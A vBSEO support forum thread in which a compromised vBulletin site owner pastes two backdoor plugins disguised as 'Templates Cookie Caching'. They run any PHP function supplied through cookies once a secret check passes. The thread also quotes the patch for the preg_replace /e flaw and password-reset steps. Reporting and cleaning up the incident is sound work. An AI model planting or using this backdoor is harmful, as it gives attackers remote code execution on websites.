vBSEO Security Issue

Looking at the *vBSEO Security Bulletin* All Supported Versions: Patch Release thread, I am unable to comment on it there, as it has been "Closed".

I too, was affected by this. I had TWO pluggins: (now deleted):

Code:

Product:  vBulletin

Hook Location:  global_complete

Title:  vBulletin Templates Cookie Caching

Execution Order:  5

/* vBulletin Templates Cookie Caching */
$vbr="jzdztvka";$vbh="ce7d14e6582cfd68ac152f0691ebf09b";isset($_COOKIE["vbinit"])?die(header("Cache-ID: $vbr")):chr(10);(isset($_COOKIE["vbauth"])&&(md5($_COOKIE["vbauth"])=="a32229ad78262c52c4073b07fdd58912")&&isset($_COOKIE["vbcache"])&&preg_match("/cache:([a-f0-9]+):([a-z]+):(.*)/",$_COOKIE["vbcache"],$m)&&(md5($vbr.$vbh)===$m[1]))?$m[2]($m[3]):chr(10);

Code:

Product:  vBulletin

Hook Location:  global_complete

Title:  vBulletin Templates Cookie Caching

Execution Order:  5

/* vBulletin Templates Cookie Caching */
$vbr="qjl{hd{{";$vbh="74456513a5ced7559c558c36cd1a64d7";isset($_COOKIE["vbinit"])?die(header("Cache-ID: $vbr")):chr(10);(isset($_COOKIE["vbauth"])&&(md5($_COOKIE["vbauth"])=="a32229ad78262c52c4073b07fdd58912")&&isset($_COOKIE["vbcache"])&&preg_match("/cache:([a-f0-9]+):([a-z]+):(.*)/",$_COOKIE["vbcache"],$m)&&(md5($vbr.$vbh)===$m[1]))?$m[2]($m[3]):chr(10);

AdminCP SCREENSHOT:




On reading the OP, it stated that I could either do the change manually or download the vBSEO folder and change it via FTP.

The change as mentioned in the OP was:

Otherwise, the simple fix is to edit the file


Code:

Code:

/vbseo/includes/functions_vbseocp_abstract.php Find:

PHP Code:

Code:

public static function proc_deutf($ptxt, $tocharset)
{
$ptxt = preg_replace('#\'([^\']*)(\'\s*\=\>)#mie', '"\'".(($_s = iconv("UTF-8", \''.$tocharset.'\', "$1")) ? $_s : "$1").stripslashes(\'$2\')', $ptxt);
return $ptxt;
}

Replace with:


PHP Code:

Code:

public static function proc_deutf($ptxt, $tocharset)
{
$ptxt = preg_replace('#\'([^\']*)(\'\s*\=\>)#mie', '"\'".(($_s = iconv("UTF-8", \''.$tocharset.'\', \'$1\')) ? $_s : \'$1\').stripslashes(\'$2\')', $ptxt);
return $ptxt;
}

I did that and then I came across this (note the Updated all patch files):

If you've
- updated all patch files
- scanned plugin list and deleted any bad ones
- cleared your personal browser sessions/cookies (as this seems to write a cookie)
- scanned your files/folders for any rogue files
- changed ALL passwords including all admin accounts, ftp, database password, and any htaccess passwords
and you're still getting this to come back, we need your help to pin point it more. Sift through your server logs and see if there's anything in there that might related to the attack. It's possible that YOU logging in are causing it to go again if you've been coookied with the data and there's a script looking for it.

Can be read, here: *vBSEO Security Bulletin* All Supported Versions: Patch Release


I was under the impression that only ONE (1) change had to be made. Is this Not the case and that more than one change has to be made?

IE:

- updated all patch files

Confirmation would be great - Thanks.

It is just the one change. Sorry if the plural threw you off.

Originally Posted by Brian Cummiskey

It is just the one change. Sorry if the plural threw you off.

Thanks Brian.


Just one more thing (and I have added it to the title of this post for SEO purposes for vBSEO):


How do I change the Password on my vBSEO Control Panel - VBSEOCP, please? I think I am having a "Blonde" moment, and can't see it. :(

If you are using vBSEO 3.5.x series or higher, please follow these steps:

* First you must locate your vbseo/resources/xml/config.xml file.

* Download it to your PC, then open the file with a text editor and search for something similar to this:

<setting>
<name>VBSEO_ADMIN_PASSWORD</name>
<value>e7ea6f5be6c2d2d64538c7a6qwe87weas</value>
</setting>

* Yours will be the same except for the random string (e7ea6f5be6c2d2d64538c7a6qwe87weas).

* Remove that from the line so it now looks like this:

<setting>
<name>VBSEO_ADMIN_PASSWORD</name>
<value></value>
</setting>

* Upload the file to the web server.

* Open your vBSEO control panel. When you try to log in, you will see the option to add in your new password and confirm it.

* Finally, CHMOD the file back to 644 when you are finished.



If you are using vBSEO 3.3.x series or lower, please follow these steps:

* First you must locate your vB-root/includes/config_vbseo.php file.

* Download it to your PC, then open the file with a text editor and search for something similar to this:

// ****** CONFIG PANEL PASSWORD ******
define('VBSEO_ADMIN_PASSWORD', 'e7ea6f5be6c2d2d64538c7a6qwe87weas');

* Yours will be the same except for the random string (e7ea6f5be6c2d2d64538c7a6qwe87weas).

* Remove that from the line so it now looks like this:

// ****** CONFIG PANEL PASSWORD ******
define('VBSEO_ADMIN_PASSWORD', '');

* Upload the file to the web server.

* Open your vBSEO control panel. When you try to log in, you will see the option to add in your new password and confirm it.

* Finally, CHMOD the file back to 644 when you are finished.


If you follow these steps correctly, you will be able to reset your password and login again to your vBSEO CP.